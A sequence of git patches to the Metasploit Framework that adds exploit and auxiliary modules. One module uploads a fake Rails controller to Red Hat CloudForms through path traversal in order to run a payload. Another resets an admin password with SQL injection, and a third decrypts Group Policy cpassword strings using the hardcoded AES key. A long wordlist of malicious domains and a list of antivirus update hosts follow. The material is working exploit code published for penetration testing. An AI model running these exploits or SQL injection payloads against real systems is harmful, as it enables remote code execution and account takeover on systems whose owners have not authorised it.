'References' => + [ + ['CVE', '2013-2068'], + ['CWE', '22'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=960422'] + ], + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Privileged' => true, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DisclosureDate' => 'Sep 4 2013', + 'DefaultOptions' => { 'PrependFork' => true }, + 'DefaultTarget' => 0 + ) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptBool.new('ROUTES', [true, 'Upload a routing file', false]), + OptString.new('CONTROLLER', [false, 'The name of the controller']), + OptString.new('ACTION', [false, 'The name of the action']), + OptString.new('TARGETURI', [ true, 'The path to the application', '/']), + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ]) + ], self.class + ) + end + + def exploit + controller = + if datastore['CONTROLLER'].nil? || datastore['CONTROLLER'].empty? + Rex::Text.rand_text_alpha_lower(rand(9) + 3) + else + datastore['CONTROLLER'].downcase + end + + action = + if datastore['ACTION'].nil? || datastore['ACTION'].empty? + Rex::Text.rand_text_alpha_lower(rand(9) + 3) + else + datastore['ACTION'].downcase + end + + data = "class #{controller.capitalize}Controller < ApplicationController; def #{action}; #{payload.encoded}; render :nothing => true; end; end\n" + + print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...") + res = send_request_cgi( + 'method' => datastore['HTTP_METHOD'], + 'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'), + "vars_#{datastore['HTTP_METHOD'].downcase}" => { + 'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)), + 'filename' => "../../app/controllers/#{controller}_controller.rb", + 'md5' => Rex::Text.md5(data) + } + ) + + fail_with(Failure::Unknown, 'No response from remote host') if res.nil? + + if datastore['ROUTES'] + data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n" + + print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...") + res = send_request_cgi( + 'method' => datastore['HTTP_METHOD'], + 'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'), + "vars_#{datastore['HTTP_METHOD'].downcase}" => { + 'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)), + 'filename' => '../../config/routes.rb', + 'md5' => Rex::Text.md5(data) + } + ) + + fail_with(Failure::Unknown, 'No response from remote host') if res.nil? + end + + print_status("Sending execute request to #{target_url(controller, action)}...") + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, controller, action) + ) + + handler + end + + def target_url(*args) + (ssl ? 'https' : 'http') + + if rport.to_i == 80 || rport.to_i == 443 + "://#{vhost}" + else + "://#{vhost}:#{rport}" + end + normalize_uri(target_uri.path, *args) + end +end + From 37826688ceb8ef9626f0111a2063123c091c8f1f Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Mon, 9 Dec 2013 15:50:19 -0200 Subject: [PATCH 022/205] Add cfme_manageiq_evm_pass_reset.rb This module exploits a SQL injection vulnerability in the "explorer" action of "miq_policy" controller of the Red Hat CloudForms Management Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by changing the password of the target account to the specified password. --- .../http/cfme_manageiq_evm_pass_reset.rb | 192 ++++++++++++++++++ 1 file changed, 192 insertions(+) create mode 100755 modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb new file mode 100755 index 0000000000..ea06de592b --- /dev/null +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -0,0 +1,192 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection', + 'Description' => %q{ + This module exploits a SQL injection vulnerability in the "explorer" + action of "miq_policy" controller of the Red Hat CloudForms Management + Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by + changing the password of the target account to the specified password. + }, + 'Author' => 'Ramon de C Valle', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-2050'], + ['CWE', '89'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062'] + ], + 'DisclosureDate' => '' + ) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('USERNAME', [true, 'Your username']), + OptString.new('PASSWORD', [true, 'Your password']), + OptString.new('TARGETUSERNAME', [true, 'The username of the target account', 'admin']), + OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']), + OptString.new('TARGETURI', [ true, 'The path to the application', '/']), + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ]) + ], self.class + ) + end + + def password_for_newer_schema + # Newer versions use ActiveModel's SecurePassword. + begin + require 'bcrypt' + + BCrypt::Password.create(datastore['TARGETPASSWORD']) + + rescue LoadError + print_error('Can\'t load "bcrypt" gem') + print_status('Using "smartvm" as the password of the target account for this request...') + '$2a$10$OHgj8h5MtsbmIAC9RPsrK.PH9t6Y.qGZxjHxUToKUJtFLJ0eY42/u' + end + end + + def password_for_older_schema + # Older versions use ManageIQ's MiqPassword. + if datastore['TARGETPASSWORD'].empty? + 'v1:{}' + else + password = '1234567890123456' + salt = '6543210987654321' + + begin + require 'ezcrypto' + + key = EzCrypto::Key.with_password(password, salt, :algorithm => 'AES-256-CBC') + "v1:{#{key.encrypt64(datastore['TARGETPASSWORD']).strip}}" + + rescue LoadError + require 'digest' + require 'openssl' + + cipher = OpenSSL::Cipher.new('AES-256-CBC') + cipher.encrypt + cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32] + encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final + "v1:{#{Rex::Text.encode_base64(encrypted)}}" + end + end + end + + def password_reset? + print_status("Trying to log into #{target_url('dashboard')} using the target account...") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'), + 'vars_post' => { + 'user_name' => datastore['TARGETUSERNAME'], + 'user_password' => datastore['TARGETPASSWORD'] + } + ) + + if res.nil? + print_error('No response from remote host') + return false + end + + if res.body =~ /"Error: (.*)"/ + print_error($1) + false + else + true + end + end + + def run + print_status("Logging into #{target_url('dashboard')}...") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'), + 'vars_post' => { + 'user_name' => datastore['USERNAME'], + 'user_password' => datastore['PASSWORD'] + } + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.body =~ /"Error: (.*)"/ + print_error($1) + return + else + session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/ + + if session.nil? + print_error('Failed to retrieve the current session id') + return + end + end + + # Newer versions don't accept POST requests. + print_status("Sending password-reset request to #{target_url('miq_policy', 'explorer')}...") + send_request_cgi( + 'cookie' => "_vmdb_session=#{session}", + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'), + 'vars_get' => { + 'profile[]' => value_for_newer_schema + } + ) + + if password_reset? + print_good('Password reset successfully') + return + else + print_error('Failed to reset password') + end + + print_status("Sending (older-schema) password-reset request to #{target_url('miq_policy', 'explorer')}...") + send_request_cgi( + 'cookie' => "_vmdb_session=#{session}", + 'method' => datastore['HTTP_METHOD'], + 'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'), + "vars_#{datastore['HTTP_METHOD'].downcase}" => { + 'profile[]' => value_for_older_schema + } + ) + + if password_reset? + print_good('Password reset successfully') + else + print_error('Failed to reset password') + end + end + + def target_url(*args) + (ssl ? 'https' : 'http') + + if rport.to_i == 80 || rport.to_i == 443 + "://#{vhost}" + else + "://#{vhost}:#{rport}" + end + normalize_uri(target_uri.path, *args) + end + + def value_for_newer_schema + "1 = 1); UPDATE users SET password_digest = '#{password_for_newer_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --" + end + + def value_for_older_schema + "1 = 1); UPDATE users SET password = '#{password_for_older_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --" + end +end From 450716c788e205bb2f2eefaafd505aef0e780f2c Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Mon, 9 Dec 2013 19:19:20 -0600 Subject: [PATCH 023/205] Remove meterpreter support from osx autologin gather. --- modules/post/osx/gather/autologin_password.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb index 13ddce9364..21a848cf60 100644 --- a/modules/post/osx/gather/autologin_password.rb +++ b/modules/post/osx/gather/autologin_password.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Post 'References' => [ ['URL', 'http://www.brock-family.org/gavin/perl/kcpassword.html'] ], - 'SessionTypes' => [ 'shell', 'meterpreter' ] + 'SessionTypes' => [ 'shell' ] )) register_advanced_options([ From 29f6740056d1ab05ed373d4833435c8309921072 Mon Sep 17 00:00:00 2001 From: TrustedSec Date: Wed, 11 Dec 2013 07:47:19 -0500 Subject: [PATCH 024/205] Created standalone module for cpassword AES decrypt --- modules/auxiliary/gather/gpp_standalone.rb | 66 ++++++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 modules/auxiliary/gather/gpp_standalone.rb diff --git a/modules/auxiliary/gather/gpp_standalone.rb b/modules/auxiliary/gather/gpp_standalone.rb new file mode 100644 index 0000000000..de92ced296 --- /dev/null +++ b/modules/auxiliary/gather/gpp_standalone.rb @@ -0,0 +1,66 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Gather Group Policy "cpassword" Decrypt Standalone', + 'Description' => %q{ + This module will allow you to specify an encrypted cpassword string + using the Microsofts public AES key. This is useful if you don't or + can't use the GPP post exploitation module. Just paste the cpassword + encrypted string and it will output the decrypted string for you. + + Tested Windows Server 2008 R2 Domain Controller. + }, + 'License' => MSF_LICENSE, + 'Author' =>[ + 'Ben Campbell ', + 'Loic Jaquemet ', + 'scriptmonkey ', + 'theLightCosine', + 'mubix', #domain/dc enumeration code + 'David Kennedy "ReL1K" ' # made the standalone module for a straight password decrypt - useful for when you need to manually grab the groups.xml or scheduledtasks.xml manually and need to decrypt without running post exploitation module + ], + 'References' => + [ + ['URL', 'http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences'], + ['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'], + ['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'], + ['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'] + ], + )) + + register_options( + [ + OptString.new('CPASSWORD', [ true, "The encrypted cpassword string to perform decryption on."]), + ], self.class) + + end + + def decrypt(encrypted_data) + padding = "=" * (4 - (encrypted_data.length % 4)) + epassword = "#{encrypted_data}#{padding}" + decoded = Rex::Text.decode_base64(epassword) + key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" + aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") + aes.decrypt + aes.key = key + plaintext = aes.update(decoded) + plaintext << aes.final + pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion + print_good("The decrypted AES password is: #{pass}") + + end + + def run + encrypted_data = datastore['CPASSWORD'] + pass = decrypt(encrypted_data) + + end +end From 554cd41403ba2cbc62ef877b222bdf28c61e0c60 Mon Sep 17 00:00:00 2001 From: zeknox Date: Thu, 12 Dec 2013 20:18:18 -0600 Subject: [PATCH 025/205] added dns_cache_scraper and useful wordlists --- data/wordlists/av-update-urls.txt | 28 + data/wordlists/malicious_urls.txt | 3970 +++++++++++++++++ modules/auxiliary/gather/dns_cache_scraper.rb | 111 + 3 files changed, 4109 insertions(+) create mode 100644 data/wordlists/av-update-urls.txt create mode 100644 data/wordlists/malicious_urls.txt create mode 100644 modules/auxiliary/gather/dns_cache_scraper.rb diff --git a/data/wordlists/av-update-urls.txt b/data/wordlists/av-update-urls.txt new file mode 100644 index 0000000000..39e85cfa08 --- /dev/null +++ b/data/wordlists/av-update-urls.txt @@ -0,0 +1,28 @@ +www.es-web.sophos.com +www.es-web.sophos.com.edgesuite.net +www.es-web-2.sophos.com +www.es-web-2.sophos.com.edgesuite.net +www.dnl-01.geo.kaspersky.com +www.downloads2.kaspersky-labs.com +www.liveupdate.symantecliveupdate.com +www.liveupdate.symantec.com +www.update.symantec.com +www.update.nai.com +www.download797.avast.com +www.guru.avg.com +www.osce8-p.activeupdate.trendmicro.com +www.forefrontdl.microsoft.com +es-web.sophos.com +es-web.sophos.com.edgesuite.net +es-web-2.sophos.com +es-web-2.sophos.com.edgesuite.net +dnl-01.geo.kaspersky.com +downloads2.kaspersky-labs.com +liveupdate.symantecliveupdate.com +liveupdate.symantec.com +update.symantec.com +update.nai.com +download797.avast.com +guru.avg.com +osce8-p.activeupdate.trendmicro.com +forefrontdl.microsoft.com diff --git a/data/wordlists/malicious_urls.txt b/data/wordlists/malicious_urls.txt new file mode 100644 index 0000000000..0d819b1763 --- /dev/null +++ b/data/wordlists/malicious_urls.txt @@ -0,0 +1,3970 @@ +00398d0.netsolhost.com +0414qd.com +0577rc.net +0koryu0.easter.ne.jp +0zz0.com +1-vinstaller.com +1.michaelwilsonmusic.com +100megabyte.com +11.lamarianella.info +12318wh.com +123mediaplayer.com +123mplayer.com +125search.com +127.co.kr +12danji.com +1322.com +1364ih5d6.ni.net.tr +137158.cn +1860php.com +197.242.148.159-static.reverse.softlayer.com +199.193.232.43-static.reverse.softlayer.com +19tenco.com +1clickmoviedownloader.info +1k.pl +1miem.org +1wstdfgh.organiccrap.com +2.refiinc.com +2.wholesalepbm.com +2.zerocostfha.com +2007scapebot.net +200mail.com +2010103.com +212.124.115.216-static.reverse.softlayer.com +21tx.com +2345.cn +249.strangled.net +24sky.co.kr +24ut1.ru +26923.com +28ytls60.ni.net.tr +2wnpf.tld.cc +3.bluepointmortgage.com +3.coolerpillow.com +3.photowallrental.com +321vn.sites.uol.com.br +3322.org +360edu.com +360tpcdn.com +365idc.com +3906523995308773357-a-1802744773732722657-s-sites.googlegroups.com +3apa3a.tomsk.tw +3dmodelagem.com +3dvideodownload.com +3herculeans.com +3kinds.net +3lsoft.com +3rbw.com +3rddownload.com +3shitou.com +3x.ro +4.androidislamic.com +4.collecorvino.org +4.dlevo.com +4.e-why.net +4.luca-volonte.org +4.newenergydata.biz +4.newenergydata.info +4.periziavela.com +4.pianetapollo.com +4.whereinitaly.com +4.whereinlazio.com +4.whereinliguria.com +4.whereinlombardy.com +4.whereinmilan.com +4.whereinmolise.com +4.whereinpiemonte.com +4.whereinpuglia.com +4.whereinsardegna.com +4.whereinsicilia.com +4.whereinsicily.com +4.whereintoscana.com +4.whereintrentinoaltoadige.com +49mp3.com +4k5.com +4kids2kids.net +4office.com +4sinstalls.info +4yourcsecret.co.tv +5.attilacrm.com +5.chinottoneri.com +5.estasiatica.com +5.eventiduepuntozero.com +50eee9e483691.daveandterra.com +50efa6486f1ef.skydivesolutions.be +50webs.com +510799b627b3d.bidbandit.co.uk +5107a120d92e0.e-chore.co.uk +5108134940e79.wheelchairsforindia.com +512.ir +51web8.net +52z.com +55555.to +58toto.com.cn +6.bbnface.com +6.bbnfaces.net +6.bbnsmsgateway.com +6.grapafood.com +6.mamaswishes.com +6.negutterking.org +614.hol.es +63.net +69-64-92-87.dedicated.abac.net +705forum.com +70mmcinema.net +798kan.com +7file.co.kr +800cdn.com +8095.net +866dy.com +866rfgroup.com +878help.com +87yd.com +888casino-luckystar.net +8index.com +8mm.hiho.jp +9.bohmamei.com +9.hclinstitute.com +9.i-am-a-pussy.com +9.m2humannexus.com +91.com +91wan.com +9yuonline.com +a.update.51edm.net +aa0987.com +aaedeusa.rubbermarbles.com +aangedraafdhypothecated.beautysupplytraining.com +ab-tools.com +ab18toys.mobi +abel_guimaraes.sites.uol.com.br +abelarddo.com +abgycwu.net +abk.premeditation.asia +about-home-security.com +aboutfacetheatre.com +acapellakan.pupu.jp +accgame.com +accu.rhetoricalpoems.asia +accuratedownload.com +achren.org +aconfideeeeeracia200.com +actes-lyon.org +actionpreventive.com +activeadultproperties.com +actsforcharged.com +ad-spider.com +ad.inewsweek.cn +adahb.org +adaptec.com +adcdls.com +addendam.co.kr +addictnetwork.net +addoncommon.info +addonspotbox.info +adebola.grandshost.com +adgallery.whitehousedrugpolicy.gov +adilsondocavacoaulasvianet.com +adlice.com +adlrma.com +admarcontabil.sites.uol.com.br +admincareers.com +adminroomsoftware.com +adobe-flashplayer.com +adobe-plugin.tk +adobeinfo.org +adrianobenigno.com.br +adsea.net +adserving.favorit-network.com +adv-tecsystems.net +advancedregistryclear.com +advantig.com +advombat.ru +advsys.net +advwinntdigiplus.net +adware-2009.com +ae-21-70.car1.losangeles1.level-3.us +ae-21-70.car1.newyork1.levei-3.net +ae-63-26.cbr2.losangeles1.edge02.net +aeiegypt.com +aerolito.com.br +afa15.com.ne.kr +affinity.modeldns.com.au +afreecodec.com +agame.ca +agassy.net +agility-ml.com +agostinhoaugusto.sites.uol.com.br +agrar24.at +agriculturetoday.in +agriexpo.in +ahrens-kind.de +ahsapamerikankapi.com +aigotek.com +airdream.ru +airedaleterrier.cz +airknorflystart.ai.funpic.de +ajguazzelli.sites.uol.com.br +ak-rallyteam.home.pl +akce.ambergold.cz +akebono.under.jp +aksteachingsolution.com +akweng.com +alabaka.net +alaluzdelabiblia.org +alanjsaffron.com +alarmsoft.com +ale.goncal.sites.uol.com.br +algumfamiliareveion2010.xpg.com.br +alipay.com +alissonluis-musico.sites.uol.com.br +alizafashion.com +alkarmel.com.jo +allalla.com +allegro.gmb.pl +allenskitchenandbath.com +allfiles100.com +allfiles107.com +allfiles108.com +allfiles109.com +allfiles110.com +allfiles118.com +allfortune777.biz +alliedcarrentals.com +alllinuxapplicationsy.asia +allmapsoft.com +allmyfiles102.com +allmyfiles115.com +allmyfiles118.com +allmyfiles15.com +allpopup.com +allthegate.com +allvideo.org.uk +allwebjobs.com +allxscan.tk +alotibi.panadool400.com +alotimg.com +alschsa.com +alseeonline.co.kr +alternativateam.cz +altervista.org +alyac.co.kr +ambergold.cz +amicitreni.org +amods.net +amoninst.com +amonisto.com +ampala.net +ampfuschini.sites.uol.com.br +amsterbtn.vv.cc +amu.adduraddonhere.info +amu.boxinstallercompany.info +amu.brandnewinstall.info +amu.helpyourselfinstall.info +amu.twobox4addon.info +an-inconvenient-truth.com +anaf.com.br +analxxxclipsyjh.dnset.com +anappz.com +ancamera.co.kr +andrea_antonacci.sites.uol.com.br +androidonlines.com +andysgame.com +aniani.info +animatedchristmasscreensavers.com +anketguidevemersion.com +anonymizercom.com +antalya.ru +antfraud.co.cc +antoine-lapeyre.com +anwaltskanzlei-drischmann.de +anydaycomstwe.net +anysecu.net +ao1004.com +aonicgamers.net +aoom.com.au +aparecida.tiburcio.sites.uol.com.br +apcig.org +apfelfeed.de +app.mkspace.biz +appcentric103.com +appet.ru +applicationscenterforally.asia +applicationscreditforally.asia +applicationsforallsitey.asia +applicationsgroupforally.asia +appline.ieguide.co.kr +appzspotdown.info +aq8.cc +aquageo.cl +aquavpn.com +aqvasex.tk +arabpetroleum.net +aralgood.com +araujofernao.sites.uol.com.br +arcodep.com +arestidessilva.sites.uol.com.br +arnondemello.com.br +arriowzzetobe.net +arrudam.zeca.sites.uol.com.br +arsinco.com.br +arta.romail3arnest.info +artemisaalves.sites.uol.com.br +artick.wen.ru +artisanwonder.com +artvideo3d.ru +asanixcorp.com +asassis.sites.uol.com.br +asearch.co.kr +asfitness.com +asformations.fr +ashtartours.com +ask.com +askadresi.net +askmeaboutcctv.com +asoftwareplus.com +asoftwareupdate.com +asoftwarez.com +asp.spinchats.com +aspenhonda.com +assarbad.net +assesi.com +asso69110.org +associatesexports.com +astaloscojonesbck.net.in +astexisnew.net +at-tech.co.il +atappz.com +atdheapp.com +atdhenetapptv.com +atdhenettvapp.com +atelier3a.fr +athena.vistapages.com +atishoobeauty.com +atlog.com.sg +atolye4.com +audio4fun.com +audiochannel.net +aumimo.sites.uol.com.br +aurummulier.pl +auto-free.com +autodopravaskoda.cz +autohideip.com +autoitscript.com +autokd.cz +automatedaffiliatemachine.com +automsn.hotmail.ru +avanquest.com +avatar.xaa.pl +avirasecureserver.com +avsm.ws +aworldbd.com +axis.my +ayrtravellersmotel.com.au +aysport.net +azurial.net +b3enzcanadaa.com +b6canadas4atea.com +babblepulse.com +babos.scrapping.cc +bacguarp.com +backupworld.biz +baddosky.nazuka.net +badgefortime.net +badgewinners.com +badgewinners.net +baduqq.com +baidu.co.th +baidu.com +bananamamor.ru +bandofbros.us +banks.co.il +banner.eurogrand.com +bapujds.thehavazoo.com +barackobamainfo.com +barakair2.com +bargainracks.co.uk +barzev.net +basitbellitalianart.eu +batangicon.net +bauerpetr.cz +bb1.sandco.org +bbb-accredited.net +bbc-world-news.co.uk +bbce-legalconsultancy.com +bbcnews-money.net +bbdignite.com +bbe.rauzqivu.ru +bbs.6858dz.com +bbs.bjchun.com +bbwscimanuk.pdsda.net +bcozindia.com +bde.be +be-funk.com +beachfiretald.com +beautifulbritain.co.uk +beckandpartners.com +begin.pro +beilequ.com +beingpcky.com +beisentse.net +beldiplomcom.75.com1.ru +bellefonte.net +bellwetherlabradors.com +belnialamsik.ru +bemarcondes.sites.uol.com.br +benini.xpg.com.br +benzavenue.com +berezutskii.narod.ru +beromder56.com +berrybots.net +best-new-zip-my.info +best-trololo.com +bestcodecpackapp.com +bestemoticon.com +bestfilesdatak.asia +bestfilesdatay.asia +bestnewzipmy.info +bestshareware.net +bestvaccine.co.kr +betivervega.com +betterinstaller.com +bezproudoff.cz +bff.7oorq8.com +bff4.7oorq8.com +bgdir.org +bggranite.ca +bh-china.cn +bh.popredirect.com +bhagidari.net +bharattruck.com +biancabgm.sites.uol.com.br +bibleversepuzzles.com +bidexbank.ohost.de +big-dadd.com +bigdogtoner.com +bigel.ru +bigfile.co.kr +bigfile.or.kr +bigmama.fr +bigs-shop.com +bikebilgisayar.com +bilico.sites.uol.com.br +bill.4java.ca +billing.hostwaves.com +bingb.5webs.net +binsetup.com +biokovoholidays.com +biotic.ro +birchcompany.in +bisrv.com +bitchat.org +bizall.co.jp +biznessmanonline.bi.funpic.de +bizserviceszero.com +bizzibeans.net +bj04.com +blackengineering.co.uk +blacknite.eu +blackroot.pro +bleee.eu +blessedbiz.bl.funpic.de +blessingworld.co.in +blessmyhustles.com +blog.jekotia.net +blue-cardinal.com +bluecutsystem.com +blueone.net +blztotal.sites.uol.com.br +bmalkids.eu +bmwfanatics.eu +boanscan.co.kr +boansite.co.kr +boansolution.co.kr +boansystem.co.kr +boanupdate.co.kr +boanweb.co.kr +bobkilasadareta.su +bokkinfh.php5.cz +bonata.pl +bookingsessential.com +bookofkisl.com +bookr24.ru +bootstrap-js.net +bora369.com +botmasterlabs.net +botoxpatient.com +bouncer.bot.nu +boykusumabrata.com +bp.olofyj.ru +bplaced.com +brainblock.com +brasstradingpty.com +bravetools.net +brianhenshaw.topcities.com +bride1.com +brightchoicelighting.com +britishracingsystems.com +broodmother.com +brop.be +bropbrap.be +brospecial.net +brothersoft.com +buffalogoesout.com +buffingtonlaw.com +bufflomens.me.uk +bufur.cz +buldir.com +bulletproof-web.com +bundesregeirung.de +bundledmonkey.com +bunker.org.ua +bunyabilla.com +burgermannnn7719.biz +buruntuyr.com +buttonguide.co.kr +buyfrome.bu.funpic.de +buyinfo-centreq.tk +buyinfo-centreqcv.tk +buypaymer.so +buyphrobi.com +by98.com +bytessence.com +c-71-63-136-200.hsd1.mn.comcast.net +c15.bkla.pw +c5.zhga.biz +cabanasdopontal.com.br +cacajose.sites.uol.com.br +cacl.in +caderix.com +cafe24.com +cairujp.sites.uol.com.br +cakircali.net +calleite.sites.uol.com.br +callingcardsinstantly.com +calmonstarn.co.uk +cam49.fr +cameraweb-cartoon.tk +camposdelapampa.com.ar +camsapoolt2.biz +canadagames.theunsignedsounds.com +canichesycia.com.ar +cannabisbeer.com +cannabislyric.com +cannabispicture.com +cannabisrecipe.com +cannabisvaporizer.com +cannabisvodka.com +canoede.info +canyonshadowlabs.com +capfile.co.kr +capitalcurbing.com +capodeicapi.eu +card.org.in +carebathe.com +carepc.co.kr +carlosfalavina.sites.uol.com.br +carlosvieira1960.sites.uol.com.br +carol.omoura.sites.uol.com.br +cartethont.com +casateixeira.sites.uol.com.br +cashcasinoworld.com +cashmandevelopment.com +cashupnew.com +casinorewards.com +castleempire.com +casualcare.net +catalactica.org.ro +cathyandjeff.com +catocife.sites.uol.com.br +catrootsz.com +catsshow2online.info +cavitelife.com +cceinfo.com.br +ccgp.gov.cn +ccgslb.net +cctae.com +cdfrj.com +cdfurniture.com.my +cdn-services.com +cdn77.net +cdndp.com +celgmed.com.br +celikleraksesuar.com +centerline.co.kr +cerec.ru +certkey.or.kr +ceskarepublika.net +ceskyjiretin.cz +cetac.sites.uol.com.br +cgermanoferreira.sites.uol.com.br +cgito.net +chachating.com +champlus.co.kr +chanywa.com +charteredcapitalbk.com +checknews.5webs.net +checkspeed.co.kr +cherie-boheme.com +cheriosmarketing.net +cherrybombpetition.org +cherryfun.com +chesterfield.net.in +chinabuznessmen.ch.funpic.de +chinadatasoft.com +chinahourse.ch.funpic.de +chinakofo.com +chol.com +cholifo.info +chonbuk.ac.kr +chris-pc.com +christmasgiftforkids.com +chrome-update.org +ciistudies.com +cimrman.org +cincyty.com +cinerak.com +ciscoc.ru +cistus.cz +citus.co.kr +civicfootprint.net +civilserve.com +classificadosgazeta.com.br +claudia.reinaldo.sites.uol.com.br +claudiomaia1969.sites.uol.com.br +cleanwaters.sites.uol.com.br +clickmon.co.kr +clickrate.com.au +clickvaccine.co.kr +client.parallelgeo.com +clientfiles23.pw +clinicvaccine.co.kr +closedir.com +cloudapp.net +cloudfile11.com +cloudfront.net +cloudsvr12.com +cloudsvr206.com +cloudsvr22.com +cloudsvr30.com +cloudsvr305.com +cloudsvr31.com +cloudsvr32.com +cloudsvr40.com +cloudsvr41.com +cloudsvr46.com +cloudsvr518.com +clping.com +cmbpupin.sites.uol.com.br +cmdi.gov.cn +cms1500assistant.com +cndbase.ru +cntajomar.es +cofeb13east.com +cog.hellofuck.co.vu +colossusmetin2.eu +com.ne.kr +com41miss.rr.nu +comercialdr.sites.uol.com.br +coming1.007webs.com +coming2.007webs.com +coming3.007webs.com +coming4.007webs.com +coming5.007webs.com +companionposes.net +compass-company.ru +compfixer.net +compforallnew.info +complainpaywall.net +compstorage.info +computo164.laweb.es +condinstalls.biz +conds.ru +conduit-download.com +conduit-services.com +conduit.com +config.shopperreports.com +congrbasering.su +conqueronline-co.91.com.tqpoint.com +consumerfocusedconspicuously.net +consumersshow.net +cont24x7host.org +contatoseguranca.hol.es +contexrender.com.au +controlpc.co.kr +convert-videos.net +cookingwithmarijuana.com +cool-screensavers.com +coolbmw.ru +coolestmovie.info +coolfreestudio.com +coolwaremax.com +costcopainlessly.org +count.fuckunion.com +counter-1.adscounter.com.ua +cowon.com +cpablue.com +cpiresmartins.sites.uol.com.br +cplrenovationsinc.com +cpudln.com +cr173.com +cracks.vg +crackspider.us +crackzone.net +creamlonsarter.co.uk +createlognet.co.uk +creativeimagephotographics.com +credocatholic.com +critical-update-server1.com +crogsz.sites.uol.com.br +crossgl.com +crossrider.com +crossunltd.npage.de +crowncraftsinc.com +crowniih.com +crownike2010-uol.sites.uol.com.br +crx-web.com +crystalgraphics.com +cs-copez.com +csaaac.com +cskrf.com +csoakley.com +csson.qc.cx +cswilliamsburg.com +cubetree.co.kr +cumfaci.eu +customer.appmys-ups.com +customer.appmys-ups.org +customers.invoice-appmy.org +customgraphicproducts.com +customsboysint.com +customyarns.com +cwgministries.org +cwmgaming.com +cwvmtudybwvr.myfw.us +cyber-ta.org +cyberlandia.org +cygnus.inc.cl +cyuqtaz.com +cznshuya.ivnet.ru +czout.wuwykym.net +d-h.st +d0wnohqimjjedf0jq.net +d0wnpzivrubajjui.com +d3moncorp.co.uk +dabtune4.eu +dada.hanztrading.com +dadajozo.sk +dadrbacau.ro +dafapunter.com +dajizzum.com +damagalko.ru +danckert.dk +dangcem.com +dape.net +dargs.su +darkboard.net +darker.in.ua +dasch.pl +dashuxmaecrme.com +dashuxmaecrmecia.ws +data.sfvolleyball.net +datarecoveryoxfordshire.co.uk +dattinggate.com +daum.net +davebarry.net +davedownloads.info +dawnframing.com +day27.007webs.com +day27s.5webs.net +day27x.5webs.net +dazzlefly.ru +dbgo.com +dcanscapital.co.uk +ddcsa.co.za +dddq.net +ddooo.com +deal-spy.com +deanwallaceplumbing.com.au +debitor.su +deborenttt.co.uk +decoderactive.com +deep-shadows.com +defencevaccine.co.kr +delavilla.com.ar +deletespyware-adware.com +deltaboatraces.net +deltariverhouse.net +demandmeticul.net +demoralization.ru +dentalsg.sites.uol.com.br +dentbeen.eu +denturesolutionsmaine.com 